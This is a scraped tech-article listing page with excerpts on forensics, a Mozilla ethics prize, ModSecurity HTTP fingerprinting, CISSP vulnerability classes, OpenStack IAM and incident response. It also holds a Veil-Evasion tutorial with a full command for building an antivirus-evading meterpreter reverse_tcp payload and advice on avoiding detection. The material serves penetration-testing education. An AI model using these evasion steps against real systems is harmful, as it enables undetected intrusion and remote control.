suspect(s). Summary In this article, we moved our skills up a notch. You learned how to analyze the captured packets to see what is happening on the network. We also studied how to see the traffic from the specific IP addresses as well as protocol-specific traffic. We also understood how to look for specific traffic based on keywords. Files, private credentials, and images have been examined to identify activities of interest. We have now become a lot better at investigating network activity. Resources for Article:   Further resources on this subject: Introduction to Mobile Forensics [article] Securing vCloud Using the vCloud Networking and Security App Firewall [article] Configuring the alerts [article]
Read more
  • 0
  • 0
  • 4372

article-image-mozilla-announces-3-5-million-award-for-responsible-computer-science-challenge-to-encourage-teaching-ethical-coding-to-cs-graduates
Melisha Dsouza
11 Oct 2018
3 min read
Save for later

Mozilla announces $3.5 million award for ‘Responsible Computer Science Challenge’ to encourage teaching ethical coding to CS graduates

Melisha Dsouza
11 Oct 2018
3 min read
Mozilla, along with Omidyar Network, Schmidt Futures, and Craig Newmark Philanthropies, has launched an initiative for professors, graduate students, and teaching assistants at U.S. colleges and universities to integrate and demonstrate the relevance of ethics into computer science education at the undergraduate level. This competition, titled 'Responsible Computer Science Challenge' has solely been launched to foster the idea of 'ethical coding' into today's times. Code written by computer scientists are widely used in fields ranging from data collection to analysis. Poorly designed code can have a negative impact on a user's privacy and security. This challenge seeks creative approaches to integrating ethics and societal considerations into undergraduate computer science education. Ideas pitched by contestants will be judged by an independent panel of experts from academia, profit and non-profit organizations and tech companies. The best proposals will be awarded up to $3.5 million over the next two years. "We are looking to encourage ways of teaching ethics that make sense in a computer science program, that make sense today, and that make sense in understanding questions of data." -Mitchell Baker, founder and chairwoman of the Mozilla Foundation What is this challenge all about? Professors are encouraged to tweak class material, for example, integrating a reading assignment on ethics to go with each project, or having computer science lessons co-taught with teaching assistants from the ethics department. The coursework introduced should encourage students to use their logical skills and come up with ideas to incorporate humanistic principles. The challenge consists of two stages: a Concept Development and Pilot Stage and a Spread and Scale Stage.T he first stage will award these proposals up to $150,000 to try out their ideas firsthand, for instance at the university where the educator teaches. The second stage will select the best of the pilots and grant them $200,000 to help them scale to other universities. Baker asserts that the competition and its prize money will yield substantial and relevant practical ideas. Ideas will be judged based on the potential of their approach, the feasibility of success, a difference from existing solutions, impact on the society, bringing new perspectives to ethics and scalability of the solution. Mozilla’s competition comes as welcomed venture after many of the top universities, like Harvard and MIT, are taking initiatives to integrate ethics within their computer science department. To know all about the competition, head over to Mozilla’s official Blog. You can also check out the entire coverage of this story at Fast Company. Mozilla drops “meritocracy” from its revised governance statement and leadership structure to actively promote diversity and inclusion Mozilla optimizes calls between JavaScript and WebAssembly in Firefox, making it almost as fast as JS to JS calls Mozilla’s new Firefox DNS security updates spark privacy hue and cry
Read more
  • 0
  • 0
  • 4331

article-image-blocking-common-attacks-using-modsecurity-25-part-1
Packt
01 Dec 2009
11 min read
Save for later

Blocking Common Attacks using ModSecurity 2.5: Part 1

Packt
01 Dec 2009
11 min read
Web applications can be attacked from a number of different angles, which is what makes defending against them so difficult. Here are just a few examples of where things can go wrong to allow a vulnerability to be exploited: The web server process serving requests can be vulnerable to exploits. Even servers such as Apache, that have a good security track record, can still suffer from security problems - it's just a part of the game that has to be accepted. The web application itself is of course a major source of problems. Originally, HTML documents were meant to be just that - documents. Over time, and especially in the last few years, they have evolved to also include code, such as client-side JavaScript. This can lead to security problems. A parallel can be drawn to Microsoft Office, which in earlier versions was plagued by security problems in its macro programming language. This, too, was caused by documents and executable code being combined in the same file. Supporting modules, such as mod_php which is used to run PHP scripts, can be subject to their own security vulnerabilities. Backend database servers, and the way that the web application interacts with them, can be a source of problems ranging from disclosure of confidential information to loss of data. HTTP fingerprinting Only amateur attackers blindly try different exploits against a server without having any idea beforehand whether they will work or not. More sophisticated adversaries will map out your network and system to find out as much information as possible about the architecture of your network and what software is running on your machines. An attacker looking to break in via a web server will try to find one he knows he can exploit, and this is where a method known as HTTP fingerprinting comes into play. We are all familiar with fingerprinting in everyday life - the practice of taking a print of the unique pattern of a person's finger to be able to identify him or her - for purposes such as identifying a criminal or opening the access door to a biosafety laboratory. HTTP fingerprinting works in a similar manner by examining the unique characteristics of how a web server responds when probed and constructing a fingerprint from the gathered information. This fingerprint is then compared to a database of fingerprints for known web servers to determine what server name and version is running on the target system. More specifically, HTTP fingerprinting works by identifying subtle differences in the way web servers handle requests - a differently formatted error page here, a slightly unusual response header there - to build a unique profile of a server that allows its name and version number to be identified. Depending on which viewpoint you take, this can be useful to a network administrator to identify which web servers are running on a network (and which might be vulnerable to attack and need to be upgraded), or it can be useful to an attacker since it will allow him to pinpoint vulnerable servers. We will be focusing on two fingerprinting tools: httprint One of the original tools - the current version is 0.321 from 2005, so it hasn't been updated with new signatures in a while. Runs on Linux, Windows, Mac OS X, and FreeBSD. httprecon This is a newer tool which was first released in 2007. It is still in active development. Runs on Windows. Let's first run httprecon against a standard Apache 2.2 server: And now let's run httprint against the same server and see what happens: As we can see, both tools correctly guess that the server is running Apache. They get the minor version number wrong, but both tell us that the major version is Apache 2.x. Try it against your own server! You can download httprint at http://www.net-square.com/httprint/ and httprecon at http://www.computec.ch/projekte/httprecon/. Tip If you get the error message Fingerprinting Error: Host/URL not found when running httprint, then try specifying the IP address of the server instead of the hostname. The fact that both tools are able to identify the server should come as no surprise as this was a standard Apache server with no attempts made to disguise it. In the following sections, we will be looking at how fingerprinting tools distinguish different web servers and see if we are able to fool them into thinking the server is running a different brand of web server software. How HTTP fingerprinting works There are many ways a fingerprinting tool can deduce which type and version of web server is running on a system. Let's take a look at some of the most common ones. Server banner The server banner is the string returned by the server in the Server response header (for example: Apache/1.3.3 (Unix) (Red Hat/Linux)). This banner can be changed by using the ModSecurity directive SecServerSignature. Here is what to do to change the banner: # Change the server banner to MyServer 1.0ServerTokens FullSecServerSignature "MyServer 1.0" Response header The HTTP response header contains a number of fields that are shared by most web servers, such as Server, Date, Accept-Ranges, Content-Length, and Content-Type. The order in which these fields appear can give a clue as to which web server type and version is serving the response. There can also be other subtle differences - the Netscape Enterprise Server, for example, prints its headers as Last-modified and Accept-ranges, with a lowercase letter in the second word, whereas Apache and Internet Information Server print the same headers as Last-Modified and Accept-Ranges. HTTP protocol responses An other way to gain information on a web server is to issue a non-standard or unusual HTTP request and observe the response that is sent back by the server. Issuing an HTTP DELETE request The HTTP DELETE command is meant to be used to delete a document from a server. Of course, all servers require that a user is authenticated before this happens, so a DELETE command from an unauthorized user will result in an error message - the question is just which error message exactly, and what HTTP error number will the server be using for the response page? Here is a DELETE request issued to our Apache server: $ nc bytelayer.com 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedDate: Mon, 27 Apr 2009 09:10:49 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Allow: GET,HEAD,POST,OPTIONS,TRACEContent-Length: 303Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method DELETE is not allowed for the URL /index.html.</p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> As we can see, the server returned a 405 - Method Not Allowed error. The error message accompanying this response in the response body is given as The requested method DELETE is not allowed for the URL/index.html. Now compare this with the following response, obtained by issuing the same request to a server at www.iis.net: $ nc www.iis.net 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedAllow: GET, HEAD, OPTIONS, TRACEContent-Type: text/htmlServer: Microsoft-IIS/7.0Set-Cookie: CSAnonymous=LmrCfhzHyQEkAAAANWY0NWY1NzgtMjE2NC00NDJjLWJlYzYtNTc4ODg0OWY5OGQz0; domain=iis.net; expires=Mon, 27-Apr-2009 09:42:35GMT; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Mon, 27 Apr 2009 09:22:34 GMTConnection: closeContent-Length: 1293<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html ><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>405 - HTTP verb used to access this page is not allowed.</title><style type="text/css"><!--body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;}h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;}h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;fontfamily:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style>< /head><body><div id="header"><h1>Server Error</h1></div><div id="content"><div class="content-container"><fieldset> <h2>405 - HTTP verb used to access this page is not allowed.</h2> <h3>The page you are looking for cannot be displayed because aninvalid method (HTTP verb) was used to attempt access.</h3> </fieldset></div></div></body></html> The site www.iis.net is Microsoft's official site for its web server platform Internet Information Services, and the Server response header indicates that it is indeed running IIS-7.0. (We have of course already seen that it is a trivial operation in most cases to fake this header, but given the fact that it's Microsoft's official IIS site we can be pretty sure that they are indeed running their own web server software.) The response generated from IIS carries the same HTTP error code, 405; however there are many subtle differences in the way the response is generated. Here are just a few: IIS uses spaces in between method names in the comma separated list for the Allow field, whereas Apache does not The response header field order differs - for example, Apache has the Date field first, whereas IIS starts out with the Allow field IIS uses the error message The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access in the response body Bad HTTP version numbers A similar experiment can be performed by specifying a non-existent HTTP protocol version number in a request. Here is what happens on the Apache server when the request GET / HTTP/5.0 is issued: $ nc bytelayer.com 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestDate: Mon, 27 Apr 2009 09:36:10 GMTServer: Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2Content-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could notunderstand.<br /></p><hr><address>Apache/2.2.8 (Fedora) mod_jk/1.2.27 DAV/2 Server at www.bytelayer.com Port 80</address></body></html> There is no HTTP version 5.0, and there probably won't be for a long time, as the latest revision of the protocol carries version number 1.1. The Apache server responds with a 400 - Bad Request Error, and the accompanying error message in the response body is Your browser sent a request that this server could not understand. Now let's see what IIS does: $ nc www.iis.net 80GET / HTTP/5.0HTTP/1.1 400 Bad RequestContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 27 Apr 2009 09:38:37 GMTConnection: closeContent-Length: 334<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=usascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML> We get the same error number, but the error message in the response body differs - this time it's HTTP Error 400. The request hostname is invalid. As HTTP 1.1 requires a Host header to be sent with requests, it is obvious that IIS assumes that any later protocol would also require this header to be sent, and the error message reflects this fact.
Read more
  • 0
  • 0
  • 4265
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at ₹800/month. Cancel anytime
article-image-veil-evasion
Packt
18 Jun 2014
6 min read
Save for later

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.) A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which includes the following: It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python It can use Metasploit-generated shellcode It can integrate third-party tools such as Hyperion (encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory The Veil-Evasion_evasion.cna script allows for Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike Payloads can be generated and seamlessly substituted into all PsExec calls Users have the ability to reuse shellcode or implement their own encryption methods It's functionality can be scripted to automate deployment Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system) Veil-Evasion can generate an exploit payload; the standalone payloads include the following options: Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity. Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor. PowerShell shellcode injector. When the payloads have been created, they can be delivered to the target in one of the following two ways: Upload and execute using Impacket and PTH toolkit UNC invocation Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script. Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot: Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot: To obtain information on a specific payload, type info<payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload: The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack. The required options include the name of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot: In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot: The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot: The final screen displays information on the generated payload, as shown in the following screenshot: The exploit could also have been created directly from a command line using the following options: kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and it's behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!" Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows: Testing, thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system. Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 4230

article-image-cissp-vulnerability-and-penetration-testing-access-control
Packt
12 Mar 2010
6 min read
Save for later

CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks, have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility for penetration into the systems that may result in unauthorized access and a compromise of confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities while penetration tests are conducted to check the following: The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained The systems can be shut down or overloaded with malicious data using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation. Vulnerability assessment Vulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software are scanned in order to indentify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as variables and constants are not properly defined or checked. This can be compromised by supplying data which is greater than what the entity can hold. This results in a memory spill over into other areas and thereby corrupts the instructions or code that need to be processed by the microprocessor. When a vulnerability is exploited it results in a security violation, which will result in a certain impact. A security violation may be an unauthorized access, escalation of privileges, or denial-of-service to the IT systems. Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be a hardware-based or software application. Generally, vulnerabilities can be classified based on the type of security error. A type is a root cause of the vulnerability. Vulnerabilities can be classified into the following types: Access Control Vulnerabilities It is an error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource. Examples: Improper or no access control list or table No privilege model Inadequate file permissions Improper or weak encoding Security violation and impact: Files, objects, or processes can be accessed directly without authenticationor routing. Authentication Vulnerabilities It is an error due to inadequate identification mechanisms so that a user or a process is not correctly identified. Examples: Weak or static passwords Improper or weak encoding, or weak algorithms Security violation and impact: An unauthorized, or less privileged user (for example, Guest user), or a less privileged process gains higher privileges, such as administrative or root access to the system Boundary Condition Vulnerabilities It is an error due to inadequate checking and validating mechanisms such that the length of the data is not checked or validated against the size of the data storage or resource. Examples: Buffer overflow Overwriting the original data in the memory Security violation and impact: Memory is overwritten with some arbitrary code so that is gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system due to memory corruption may be exploited to get command prompt, or shell access, by injecting an arbitrary code Configuration Weakness Vulnerabilities It is an error due to the improper configuration of system parameters, or leaving the default configuration settings as it is, which may not be secure. Examples: Default security policy configuration File and print access in Internet connection sharing Security violation and impact: Most of the default configuration settings of many software applications are published and are available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges resulting in privilege escalation impacts. Exception Handling Vulnerabilities It is an error due to improper setup or coding where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions. Example: SQL Injection Security violation and impact: By injecting exceptional data, user credentials can be captured by an unauthorized entity Input Validation Vulnerabilities It is an error due to a lack of verification mechanisms to validate the input data or contents. Examples: Directory traversal Malformed URLs Security violation and impact: Due to poor input validation, access to system-privileged programs may be obtained. Randomization Vulnerabilities It is an error due to a mismatch in random data or random data for the process. Specifically, these vulnerabilities are predominantly related to encryption algorithms. Examples: Weak encryption key Insufficient random data Security violation and impact: Cryptographic key can be compromised which will impact the data and access security. Resource Vulnerabilities It is an error due to a lack of resources availability for correct operations or processes. Examples: Memory getting full CPU is completely utilized Security violation and impact: Due to the lack of resources the system becomes unstable or hangs. This results in a denial of services to the legitimate users. State Error It is an error that is a result of the lack of state maintenance due to incorrect process flows. Examples: Opening multiple tabs in web browsers Security violation and impact: There are specific security attacks, such as Cross-site scripting (XSS), that will result in user-authenticated sessions being hijacked. Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by the application vendors and hardening the systems.
Read more
  • 0
  • 0
  • 4217

article-image-secure-private-cloud-iam
Savia Lobo
10 May 2018
11 min read
Save for later

How to secure a private cloud using IAM

Savia Lobo
10 May 2018
11 min read
In this article, we look at securing the private cloud using IAM. For IAM, OpenStack uses the Keystone project. Keystone provides the identity, token, catalog, and policy services, which are used specifically by OpenStack services. It is organized as a group of internal services exposed on one or many endpoints. For example, an authentication call validates the user and project credentials with the identity service. [box type="shadow" align="" class="" width=""]This article is an excerpt from the book,'Cloud Security Automation'. In this book, you'll learn how to work with OpenStack security modules and learn how private cloud security functions can be automated for better time and cost-effectiveness.[/box] Authentication Authentication is an integral part of an OpenStack deployment and so we must be careful about the system design. Authentication is the process of confirming a user's identity, which means that a user is actually who they claim to be. For example, providing a username and a password when logging into a system. Keystone supports authentication using the username and password, LDAP, and external authentication methods. After successful authentication, the identity service provides the user with an authorization token, which is further used for subsequent service requests. Transport Layer Security (TLS) provides authentication between services and users using X.509 certificates. The default mode for TLS is server-side only authentication, but we can also use certificates for client authentication. However, in authentication, there can also be the case where a hacker is trying to access the console by guessing your username and password. If we have not enabled the policy to handle this, it can be disastrous. For this, we can use the Failed Login Policy, which states that a maximum number of attempts are allowed for a failed login; after that, the account is blocked for a certain number of hours and the user will also get a notification about it. However, the identity service provided in Keystone does not provide a method to limit access to accounts after repeated unsuccessful login attempts. For this, we need to rely on an external authentication system that blocks out an account after a configured number of failed login attempts. Then, the account might only be unlocked with further side-channel intervention, or on request, or after a certain duration. We can use detection techniques to the fullest only when we have a prevention method available to save them from damage. In the detection process, we frequently review the access control logs to identify unauthorized attempts to access accounts. During the review of access control logs, if we find any hints of a brute force attack (where the user tries to guess the username and password to log in to the system), we can define a strong username and password or block the source of the attack (IP) through firewall rules. When we define firewall rules on Keystone node, it restricts the connection, which helps to reduce the attack surface. Apart from this, reviewing access control logs also helps to examine the account activity for unusual logins and suspicious actions, so that we can take corrective actions such as disabling the account. To increase the level of security, we can also utilize MFA for network access to the privileged user accounts. Keystone supports external authentication services through the Apache web server that can provide this functionality. Servers can also enforce client-side authentication using certificates. This will help to get rid of brute force and phishing attacks that may compromise administrator passwords. Authentication methods – internal and external Keystone stores user credentials in a database or may use an LDAP-compliant directory server. The Keystone identity database can be kept separate from databases used by other OpenStack services to reduce the risk of a compromise of the stored credentials. When we use the username and password to authenticate, identity does not apply policies for password strength, expiration, or failed authentication attempts. For this, we need to implement external authentication services. To integrate an external authentication system or organize an existing directory service to manage users account management, we can use LDAP. LDAP simplifies the integration process. In OpenStack authentication and authorization, the policy may be delegated to another service. For example, an organization that is going to deploy a private cloud and already has a database of employees and users in an LDAP system. Using this LDAP as an authentication authority, requests to the Identity service (Keystone) are transferred to the LDAP system, which allows or denies requests based on its policies. After successful authentication, the identity service generates a token for access to the authorized services. Now, if the LDAP has already defined attributes for the user such as the admin, finance, and HR departments, these must be mapped into roles and groups within identity for use by the various OpenStack services. We need to define this mapping into Keystone node configuration files stored at /etc/keystone/keystone.conf. Keystone must not be allowed to write to the LDAP used for authentication outside of the OpenStack Scope, as there is a chance to allow a sufficiently privileged Keystone user to make changes to the LDAP directory, which is not desirable from a security point of view. This can also lead to unauthorized access of other information and resources. So, if we have other authentication providers such as LDAP or Active Directory, then user provisioning always happens at other authentication provider systems. For external authentication, we have the following methods: MFA: The MFA service requires the user to provide additional layers of information for authentication such as a one-time password token or X.509 certificate (called MFA token). Once MFA is implemented, the user will have to enter the MFA token after putting the user ID and password in for a successful login. Password policy enforcement: Once the external authentication service is in place, we can define the strength of the user passwords to conform to the minimum standards for length, diversity of characters, expiration, or failed login attempts. Keystone also supports TLS-based client authentication. TLS client authentication provides an additional authentication factor, apart from the username and password, which provides greater reliability on user identification. It reduces the risk of unauthorized access when usernames and passwords are compromised. However, TLS-based authentication is not cost effective as we need to have a certificate for each of the clients. Authorization Keystone also provides the option of groups and roles. Users belong to groups where a group has a list of roles. All of the OpenStack services, such as Cinder, Glance, nova, and Horizon, reference the roles of the user attempting to access the service. OpenStack policy enforcers always consider the policy rule associated with each resource and use the user’s group or role, and their association, to determine and allow or deny the service access. Before configuring roles, groups, and users, we should document your required access control policies for the OpenStack installation. The policies must be as per the regulatory or legal requirements of the organization. Additional changes to the access control configuration should be done as per the formal policies. These policies must include the conditions and processes for creating, deleting, disabling, and enabling accounts, and for assigning privileges to the accounts. One needs to review these policies from time to time and ensure that the configuration is in compliance with the approved policies. For user creation and administration, there must be a user created with the admin role in Keystone for each OpenStack service. This account will provide the service with the authorization to authenticate users. Nova (compute) and Swift (object storage) can be configured to use the Identity service to store authentication information. For the test environment, we can have tempAuth, which records user credentials in a text file, but it is not recommended for the production environment. The OpenStack administrator must protect sensitive configuration files from unauthorized modification with mandatory access control frameworks such as SELinux or DAC. Also, we need to protect the Keystone configuration files, which are stored at /etc/keystone/keystone.conf, and also the X.509 certificates. It is recommended that cloud admin users must authenticate using the identity service (Keystone) and an external authentication service that supports two-factor authentication. Getting authenticated with two-factor authentication reduces the risk of compromised passwords. It is also recommended in the NIST guideline called NIST 800-53 IA-2(1). Which defines MFA for network access to privileged accounts, when one factor is provided by a separate device from the system being accessed. Policy, tokens, and domains In OpenStack, every service defines the access policies for its resources in a policy file, where a resource can be like an API access, it can create and attach Cinder volume, or it can create an instance. The policy rules are defined in JSON format in a file called policy.json. Only administrators can modify the service-based policy.json file, to control the access to the various resources. However, one has to also ensure that any changes to the access control policies do not unintentionally breach or create an option to breach the security of any resource. Any changes made to policy.json are applied immediately and it does not need any service restart. After a user is authenticated, a token is generated for authorization and access to an OpenStack environment. A token can have a variable lifespan, but the default value is 1 hour. It is also recommended to lower the lifespan of the token to a certain level so that within the specified timeframe the internal service can complete the task. If the token expires before task completion, the system can be unresponsive. Keystone also supports token revocation. For this, it uses an API to revoke a token and to list the revoked tokens. In OpenStack Newton release, there are four supported token types: UUID, PKI, PKIZ, and fernet. After the OpenStack Ocata release, there are two supported token types: UUID and fernet. We'll see all of these token types in detail here: UUID: These tokens are persistent tokens. UUID tokens are 32 bytes in length, which must be persisted in the backend. They are stored in the Keystone backend, along with the metadata for authentication. All of the clients must pass their UUID token to the Keystone (identity service) in order to validate it. PKI and PKIZ: These are signed documents that contain the authentication content, as well as the service catalog. The difference between the PKI and PKIZ is that PKIZ tokens are compressed to help mitigate the size issues of PKI (sometimes PKI tokens becomes very long). Both of these tokens have become obsolete after the Ocata release. The length of PKI and PKIZ tokens typically exceeds 1,600 bytes. The Identity service uses public and private key pairs and certificates in order to create and validate these tokens. Fernet: These tokens are the default supported token provider for OpenStack Pike Release. It is a secure messaging format explicitly designed for use in API tokens. They are nonpersistent, lightweight (fall in the range of 180 to 240 bytes), and reduce the operational overhead. Authentication and authorization metadata is neatly bundled into a message-packed payload, which is then encrypted and signed in as a fernet token. In the OpenStack, the Keystone Service domain is a high-level container for projects, users, and groups. Domains are used to centrally manage all Keystone-based identity components. Compute, storage, and other resources can be logically grouped into multiple projects, which can further be grouped under a master account. Users of different domains can be represented in different authentication backends and have different attributes that must be mapped to a single set of roles and privileges in the policy definitions to access the various service resources. Domain-specific authentication drivers allow the identity service to be configured for multiple domains, using domain-specific configuration files stored at keystone.conf. Federated identity Federated identity enables you to establish trusts between identity providers and the cloud environment (OpenStack Cloud). It gives you secure access to cloud resources using your existing identity. You do not need to remember multiple credentials to access your applications. Now, the question is, what is the reason for using federated identity? This is answered as follows: It enables your security team to manage all of the users (cloud or noncloud) from a single identity application It enables you to set up different identity providers on the basis of the application that somewhere creates an additional workload for the security team and leads the security risk as well It gives ease of life to users by proving them a single credential for all of the apps so that they can save the time they spend on the forgot password page Federated identity enables you to have a single sign-on mechanism. We can implement it using SAML 2.0. To do this, you need to run the identity service provider under Apache. We learned about securing your private cloud and the authentication process therein. If you've enjoyed this article, do check out 'Cloud Security Automation' for a hands-on experience of automating your cloud security and governance. Top 5 cloud security threats to look out for in 2018 Cloud Security Tips: Locking Your Account Down with AWS Identity Access Manager (IAM)
Read more
  • 0
  • 0
  • 4187

article-image-incident-response-and-live-analysis
Packt
10 Jun 2016
30 min read
Save for later

Incident Response and Live Analysis

Packt
10 Jun 2016
30 min read
In this article by Ayman Shaaban and Konstantin Sapronov, author of the book Practical Windows Forensics, describe the stages of preparation to respond to an incident are a matter which much attention should be paid to. In some cases, the lack of necessary tools during the incident leads to the inability to perform the necessary actions at the right time. Taking into account that the reaction time of an incident depends on the efficiency of the incident handling process, it becomes clear that in order to prepare the IR team, its technical support should be very careful. The whole set of requirements can be divided into several categories for the IR team: Skills Hardware Software (For more resources related to this topic, see here.) Let's consider the main issues that may arise during the preparation of the incident response team in more detail. If we want to build a computer security incident response team, we need people with a certain set of skills and technical expertise to perform technical tasks and effectively communicate with other external contacts. Now, we will consider the skills of members of the team. The set of skills that members of the team need to have can be divided into two groups: Personal skills Technical skills Personal skills Personal skills are very important for a successful response team. This is because the interaction with team members who are technical experts but have poor social skills can lead to misunderstanding and misinterpretation of the results, the consequences of which may affect the team's reputation. A list of key personal skills will be discussed in the following sections. Written communication For many IR teams, a large part of their communication occurs through written documents. These communications can take many forms, including e-mails concerning incidents documentation of event or incident reports, vulnerabilities, and other technical information notifications. Incident response team members must be able to write clearly and concisely, describe activities accurately, and provide information that is easy for their readers to understand. Oral communication The ability to communicate effectively though spoken communication is also an 